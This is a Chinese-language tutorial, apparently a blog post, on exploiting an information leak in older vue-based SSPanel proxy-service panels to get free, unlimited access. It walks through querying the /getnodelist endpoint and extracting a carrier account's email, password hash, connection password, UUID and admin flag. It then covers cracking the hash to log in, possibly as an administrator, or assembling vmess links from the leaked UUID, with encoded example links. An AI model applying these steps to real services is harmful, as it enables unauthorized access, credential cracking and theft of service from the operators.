SSPanel通过单端口承载用户白嫖机场
在之前发布的扫号教程中,我最后提到过SSPanel机场存在某个漏洞,虽然早就修复了,但是还是有很多机场使用之前的老版本,不过即使使用的是老版本,但是没有满足以下条件也是无法利用。
配合视频观看>>点击查看
需满足的条件
- 使用的SSPanel版本为vue版
- 配置了单端口多用户的承载用户
判断SSPanel是否为vue版
- 访问
机场域名+/getnodelist(例如:https://bulianglin.com/getnodelist) - 如果返回了
{"ret":-1}则表示版本为vue(未登陆的情况下) - 如果返回其他诸如
404页面则表示非vue版
确定是否配置了承载用户
- 确定是vue版本之后,先注册一个账号登陆到该机场
- 在登陆的状态下再访问
机场域名+/getnodelist,会返回一段json数据。 - json经过压缩,可以通过在线工具将其还原格式化更好观察。
将json保存到文本中,搜索
nodes_muport属性- 如果
nodes_muport只有一对中括号[],则表示这个机场没有配置单端口多用户的承载节点和承载用户 - 如果存在
server属性,则表示配置了承载节点,如果存在user属性且存在id、email等字段,则表示配置了承载用户,我们要的就是这个承载用户
- 如果
由于shadowsocks不支持单端口多用户,所以如果机场想通过一个端口来承载机场所有用户的shadowsocks流量就必须配置一个单端口多用户的承载用户。并且这个承载用户的流量必须足够多到用不完。但是我发现很多不是ss节点的机场(比如只提供vmess或者trojan)也会配置承载用户,估计是以前配置过ss节点
利用承载用户白嫖机场
有了这个承载用户就好办了,我们需要关注该承载用户的以下几个关键字段:
email:登陆邮箱pass:登陆密码(经过hash算法加密,需要解密或者跑字典破解)passwd:ss的连接密码transfer_enable:流量(一般是一个巨大的数字,表示用不完,如果是0则表示该账号没有流量)is_admin:是否为管理员(如果是true就可以登录网站后台)uuid:vmess的用户id
利用方式一:
如果你能直接解密pass,就可以直接通过邮箱email和密码pass登陆该机场,获得一个无限量的机场账号(如果是is_admin=true的话还可以进入后台管理)
利用方式二:
如果pass解不出来,那么就可以直接通过该承载用户的passwd或者uuid来拼接机场的节点信息
在json数据中 nodeinfo->nodes 下保存了该站点的所有节点信息,每个id都是一个节点
通过raw_node->server 字段可以知道当前节点的配置信息,根据特征来判断是什么类型的节点,如果判断不出来可以在机场的节点列表看看有没有关于节点类型的说明
比如: "server": "1.1.1.1;80;2;ws;;path=\/v2ray|host=baidu.com"
看上去是vmess节点,但是没有用户ID,这时候就需要把承载用户的UUID加上去,假设承载用户的uuid是:b0d429b5-79a8-4788-bf4e-862a76ad673b
对应的vmess链接是:
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogIiIsDQogICJhZGQiOiAiMS4xLjEuMSIsDQogICJwb3J0IjogIjgwIiwNCiAgImlkIjogImIwZDQyOWI1LTc5YTgtNDc4OC1iZjRlLTg2MmE3NmFkNjczYiIsDQogICJhaWQiOiAiMiIsDQogICJzY3kiOiAiYXV0byIsDQogICJuZXQiOiAid3MiLA0KICAidHlwZSI6ICJub25lIiwNCiAgImhvc3QiOiAiYmFpZHUuY29tIiwNCiAgInBhdGgiOiAiL3YycmF5IiwNCiAgInRscyI6ICIiLA0KICAic25pIjogIiINCn0=
或者套了中转: "server": "1.1.1.1;80;2;ws;;path=\/v2ray|host=baidu.com|relayserver=zz.baidu.com|outside_port=22224"
最后对应的vmess链接是:
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogIiIsDQogICJhZGQiOiAienouYmFpZHUuY29tIiwNCiAgInBvcnQiOiAiMjIyMjQiLA0KICAiaWQiOiAiYjBkNDI5YjUtNzlhOC00Nzg4LWJmNGUtODYyYTc2YWQ2NzNiIiwNCiAgImFpZCI6ICIyIiwNCiAgInNjeSI6ICJhdXRvIiwNCiAgIm5ldCI6ICJ3cyIsDQogICJ0eXBlIjogIm5vbmUiLA0KICAiaG9zdCI6ICJiYWlkdS5jb20iLA0KICAicGF0aCI6ICIvdjJyYXkiLA0KICAidGxzIjogIiIsDQogICJzbmkiOiAiIg0KfQ==
导入到翻墙软件后,确定可以连接后就可以白嫖这个承载用户了